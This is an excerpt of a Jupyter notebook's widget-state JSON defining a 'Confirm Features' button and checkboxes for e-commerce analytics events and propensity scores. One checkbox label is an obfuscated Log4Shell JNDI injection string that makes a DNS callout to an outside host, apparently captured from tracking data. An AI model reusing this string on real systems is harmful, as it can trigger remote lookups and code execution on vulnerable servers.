"min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "dabe307bb3814c0b928f4e6afe5e8bc8": { + "model_module": 
"@jupyter-widgets/controls", + "model_name": "ButtonModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ButtonModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ButtonView", + "button_style": "", + "description": "Confirm Features", + "disabled": false, + "icon": "", + "layout": "IPY_MODEL_c2b1c7eb19aa431ab36f63e725062225", + "style": "IPY_MODEL_becaf358ea92408781b9fed526032216", + "tooltip": "" + } + }, + "c2b1c7eb19aa431ab36f63e725062225": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "becaf358ea92408781b9fed526032216": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ButtonStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ButtonStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "button_color": null, + "font_weight": "" + } + }, + "cb59e53ee06f4cdcba6970997af52a0d": { + "model_module": "@jupyter-widgets/controls", + "model_name": "GridBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "GridBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "GridBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_435c30134cab4d30b02115b45315c96f", + "IPY_MODEL_cb90e799babe4000a2385a42835715dc", + "IPY_MODEL_4dab22eea30f4879b69c42957bee96dc", + "IPY_MODEL_158f1d53adf54c528eb0c290c1bf38a7", + "IPY_MODEL_0cebc5f02aed4a96a4bc46a1123e83f2", + "IPY_MODEL_069ad5938cc44d1b98c0b715c120e2fb", + "IPY_MODEL_29490473f86c4224b40f1bc14dcf4126", + "IPY_MODEL_d76a2a87928a4feaa388e906e3dba5c0", + "IPY_MODEL_f106dfaad61d4048a9dee141dbfc70f8", + "IPY_MODEL_27093f0b59604748b47e1011ade33069", + "IPY_MODEL_b98edc06317d4ba68678baade932be80", + "IPY_MODEL_7506fba59d244542a9f950d865375a7f", + "IPY_MODEL_0860bfa9645f406e81b47285a8c5ea94", + "IPY_MODEL_7e36b5eab7b74d2fac02312aec136228", + "IPY_MODEL_b18c8b6f127241458d6304b8e43d0b40", + 
"IPY_MODEL_377fb1783fae4079a4406df02b6a2840", + "IPY_MODEL_09d4235a91e34e84b8b773cebc19a854", + "IPY_MODEL_cd912a4adae54ba8a2c32dc01402c523", + "IPY_MODEL_81fdbc9e894a4ba39f19eea43a6935f2", + "IPY_MODEL_72eebc41731d4dafbd2a4528032bdf11", + "IPY_MODEL_ce94c729917848e8b98b965163e4466b", + "IPY_MODEL_16031519618548678483de6e12dd3245", + "IPY_MODEL_09fce7da46184625a657e076f89ffbad", + "IPY_MODEL_fe4d60abead4406dbac0e54e6384f787", + "IPY_MODEL_fb03611950c8499a9078544ba5eeefa3", + "IPY_MODEL_d1d9f57fa9fa42d797325eed00664ed8", + "IPY_MODEL_2ff572bb94534bae8dfa5b61bb36adfd", + "IPY_MODEL_903f3582fe194b61b062f6575cadf380", + "IPY_MODEL_4da6287f1f5140228c1cbbe3e9873ea0" + ], + "layout": "IPY_MODEL_fc2e0535ede24be5a2b28ff37b307475" + } + }, + "435c30134cab4d30b02115b45315c96f": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "view_search_results", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_50a2eed8e87a4b3fbe4f7a31d5c54a5c", + "style": "IPY_MODEL_28580af1f9e54bbe99dd7ef9b3e1c7c0", + "value": false + } + }, + "cb90e799babe4000a2385a42835715dc": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "view_promotion", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_f2e199b4f49d4beda16da275bad92312", + "style": "IPY_MODEL_2280d04b76b34456a3e0ebb257cbb58d", + "value": false + } + }, + "4dab22eea30f4879b69c42957bee96dc": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "view_item_list", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_9e14f8ccc46a415382508d2f398801b1", + "style": "IPY_MODEL_6cc57addbbe3499fae8d82188d6cc466", + "value": false + } + }, + "158f1d53adf54c528eb0c290c1bf38a7": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "view_item", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_2a36fd87b7e048ab80b41250b2444cff", + "style": "IPY_MODEL_6f80b1fdc1a645dda301f305c3fcfa3c", + "value": false + } + }, + "0cebc5f02aed4a96a4bc46a1123e83f2": { + 
"model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "view_cart", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_d5d5d1041afb49fba74e2010a8b517ef", + "style": "IPY_MODEL_df4a6c1954694ebd9078d2bbce331c0c", + "value": true + } + }, + "069ad5938cc44d1b98c0b715c120e2fb": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "video_play", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_d6ea703fef6a40648d33940ea0533477", + "style": "IPY_MODEL_674f1b434cc248398e785c641cccf6a3", + "value": false + } + }, + "29490473f86c4224b40f1bc14dcf4126": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "user_engagement", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_712af8b20d414f7eae375231b30ebf93", + "style": "IPY_MODEL_ff5753360adf4971b513dc197a10ba12", + "value": false + } + }, + "d76a2a87928a4feaa388e906e3dba5c0": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "session_start", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_472b0409a6784d7e8595d430074b4976", + "style": "IPY_MODEL_fbf924f270ad49b4ae7fe6d33f3de998", + "value": false + } + }, + "f106dfaad61d4048a9dee141dbfc70f8": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "select_promotion", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_e1869fb4d1a54d7b91db2a714bc8ab69", + "style": "IPY_MODEL_e99040a596774e35b013e07b97d59aa6", + "value": true + } + }, + "27093f0b59604748b47e1011ade33069": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": 
"1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "select_item", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_416e7a5741484457b37ee2cc6cb46769", + "style": "IPY_MODEL_5abc6dd6fc8a42cfac748645d7d5120d", + "value": false + } + }, + "b98edc06317d4ba68678baade932be80": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "scroll", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_f0571918d4964cb0a4e8c78b7dc5b81d", + "style": "IPY_MODEL_ee01fb5c76c6479a9764e8e8c7deeb24", + "value": true + } + }, + "7506fba59d244542a9f950d865375a7f": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "remove_from_cart", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_dd9432faf01e49f7b645575d9422a4df", + "style": "IPY_MODEL_b11bbb17f64a4cb88670c3251361abc1", + "value": false + } + }, + "0860bfa9645f406e81b47285a8c5ea94": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "page_view", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_008431306c25440584e45566ef6e2ef3", + "style": "IPY_MODEL_5b64a9e9922f406f8834ebac63a09ca8", + "value": false + } + }, + "7e36b5eab7b74d2fac02312aec136228": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "maj_purchase_propensity_vbb_30_15", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_682288ea4e1440d3974262dfffefc51a", + "style": "IPY_MODEL_8dfc8df4b9f241cf901c3fbb86554cd8", + "value": false + } + }, + "b18c8b6f127241458d6304b8e43d0b40": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": 
"@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "maj_purchase_propensity_30_15", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_68a0bbe8687e4db9b87542ef7023345f", + "style": "IPY_MODEL_70a89485f8eb4c9680ccdb6e20041f65", + "value": false + } + }, + "377fb1783fae4079a4406df02b6a2840": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "maj_cltv_180_30", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_6009ba22e5134b42a48038970f8a8087", + "style": "IPY_MODEL_25374e0a7ab5466bbcedf7cf15974c4f", + "value": false + } + }, + "09d4235a91e34e84b8b773cebc19a854": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "maj_churn_propensity_30_15", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_3be07a9a36c14e609506a8d2ac30439a", + "style": "IPY_MODEL_e43a24fb4e5c4fdcb39febd5fb66ab45", + "value": false + } + }, + "cd912a4adae54ba8a2c32dc01402c523": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "maj_audience_segmentation_15", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_13942a8909f945c395d55f92033505ff", + "style": "IPY_MODEL_51fc19877c544160ba1f98487b04d612", + "value": false + } + }, + "81fdbc9e894a4ba39f19eea43a6935f2": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "imported", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_eedd93a671824bde815adb53be8171d4", + "style": "IPY_MODEL_b02ed3fb150a4688b13ebcde50c08ffb", + "value": false + } + }, + "72eebc41731d4dafbd2a4528032bdf11": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": 
"1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "first_visit", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_e03e968d53544e44bb8aee7f544f1bb7", + "style": "IPY_MODEL_c4e4e8e3c9d748ffb96f74c1e7d06456", + "value": false + } + }, + "ce94c729917848e8b98b965163e4466b": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "errors", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_6e467383b0df416ea690cbd818bceba2", + "style": "IPY_MODEL_f4e0a99311504204a79f48de9ec95280", + "value": false + } + }, + "16031519618548678483de6e12dd3245": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "click", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_d8fffd09966f40cd8f443d6083121fbf", + "style": "IPY_MODEL_2fa658f90da941b6a590c278c67e548e", + "value": true + } + }, + "09fce7da46184625a657e076f89ffbad": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "begin_checkout", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_32a25d57545340c18731eb25a79e8b47", + "style": "IPY_MODEL_f0da6d221d02448bba7dc60802325cfd", + "value": false + } + }, + "fe4d60abead4406dbac0e54e6384f787": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "ads_conversion_Checkout_1", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_e17a16c5dc694b899e1e44f3be7583e5", + "style": "IPY_MODEL_bd92677245d34eaa9245935dd5a20932", + "value": false + } + }, + "fb03611950c8499a9078544ba5eeefa3": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": 
"@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "add_to_wishlist", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_4b9b4d011c1c4ccc886e6141ce25f235", + "style": "IPY_MODEL_74a8b740324c4efead37803b886a7921", + "value": true + } + }, + "d1d9f57fa9fa42d797325eed00664ed8": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "add_to_cart", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_56fcef4dc65e40e087bbb2821874af17", + "style": "IPY_MODEL_8673a30c6d5a4f419020438fd49b2859", + "value": true + } + }, + "2ff572bb94534bae8dfa5b61bb36adfd": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "add_shipping_info", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_346c028bf83344f6b6b4ac47d243a3f0", + "style": "IPY_MODEL_574170a8682d444abdb3a4762b7fc0e5", + "value": true + } + }, + "903f3582fe194b61b062f6575cadf380": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "add_payment_info", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_58b355bd18364678a41ca309605018a5", + "style": "IPY_MODEL_8f02fdb7148e4970b349c624f4bdf198", + "value": true + } + }, + "4da6287f1f5140228c1cbbe3e9873ea0": { + "model_module": "@jupyter-widgets/controls", + "model_name": "CheckboxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "CheckboxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "CheckboxView", + "description": "${jndi:dns://33${::-.}post${::-.}analyti", + "description_tooltip": null, + "disabled": false, + "indent": false, + "layout": "IPY_MODEL_bf52704eb9744bc996a1f98bb2b1698d", + "style": "IPY_MODEL_a2855718cc134441a42da59e40da45b7", + "value": false + } + }, + "fc2e0535ede24be5a2b28ff37b307475": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + 
"align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": "repeat(3, 1fr)", + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "50a2eed8e87a4b3fbe4f7a31d5c54a5c": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "28580af1f9e54bbe99dd7ef9b3e1c7c0": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "f2e199b4f49d4beda16da275bad92312": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, 
+ "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "2280d04b76b34456a3e0ebb257cbb58d": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "9e14f8ccc46a415382508d2f398801b1": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "6cc57addbbe3499fae8d82188d6cc466": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "2a36fd87b7e048ab80b41250b2444cff": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": 